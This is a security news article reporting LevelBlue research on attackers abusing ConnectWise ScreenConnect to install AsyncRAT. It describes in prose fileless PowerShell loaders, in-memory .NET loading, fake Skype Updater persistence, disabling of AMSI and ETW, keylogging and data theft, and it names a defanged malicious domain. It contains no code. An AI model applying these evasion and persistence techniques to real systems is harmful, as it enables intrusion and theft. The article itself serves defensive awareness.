Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

Attackers abuse ConnectWise ScreenConnect to drop AsyncRAT

Hackers exploit ConnectWise ScreenConnect to drop AsyncRAT via scripted loaders, stealing data and persisting with a fake Skype updater. LevelBlue researchers warn of a campaign abusing ConnectWise ScreenConnect to deploy AsyncRAT. Attackers use VBScript/PowerShell loaders and achieve persistence via a fake Skype updater. ConnectWise ScreenConnect is a remote desktop and remote support software designed to enable […]

Info-Stealing attacks

Hackers exploit ConnectWise ScreenConnect to drop AsyncRAT via scripted loaders, stealing data and persisting with a fake Skype updater.

LevelBlue researchers warn of a campaign abusing ConnectWise ScreenConnect to deploy AsyncRAT. Attackers use VBScript/PowerShell loaders and achieve persistence via a fake Skype updater.

ConnectWise ScreenConnect is a remote desktop and remote support software designed to enable secure, real-time access to computers and devices from anywhere. IT professionals, managed service providers (MSPs), and businesses widely utilize it to troubleshoot, maintain, and remotely manage endpoints.

The attack started with a compromised ScreenConnect client, threat actors initiated an interactive session through a malicious domain (relay.shipperzone[.]online) linked to unauthorized ScreenConnect deployments.

A VBScript triggered PowerShell commands that fetched two payloads, stored them in the public folder, and executed them directly in memory. The attackers decoded and ran .NET assemblies directly in memory instead of saving executables to disk, using a classic fileless malware trick that makes detection and defense much harder.

“The two payloads, logs.ldk and logs.ldr, were downloaded from a remote server. These files were written to the C:\Users\Public\ directory and loaded into memory using reflection. The script converted the first-stage payload (logs.ldk) into a byte array and passed the second (logs.ldr) directly to the Main() method. The script retrieves encoded data from the web, decodes it in-memory, and invokes a method in a dynamically loaded .NET assembly.” reads the report published by LevelBlue.

“This technique exemplifies fileless malware: no executable is written to disk, and all malicious logic is executed in-memory.”

Obfuscator.dll is the first in-memory stage of the AsyncRAT infection chain. It launches execution, sets up persistence via a fake “Skype Updater,” and disables defenses like AMSI and ETW. The malware includes It three core classes to handle initialization, dynamic payload loading, and anti-analysis tactics, ensuring stealth and preparing the system for the main payload.

AsyncClient.exe is the core C2 engine of the AsyncRAT attack chain. It decrypts config with AES-256, connects to C2 servers, and parses commands via a custom protocol. The malware gathers system and security details, monitors user activity with a keylogger, and exfiltrates sensitive data like browser extensions. The malware maintains persistence via scheduled tasks using the CreateLoginTask() function seen in Obfuscator.dll or redundantly recreated from AsyncClient.

“Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution.” concludes the report. “This approach bypasses traditional disk-based detection by operating in memory, making these threats harder to detect, analyze, and eradicate.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, AsyncRAT)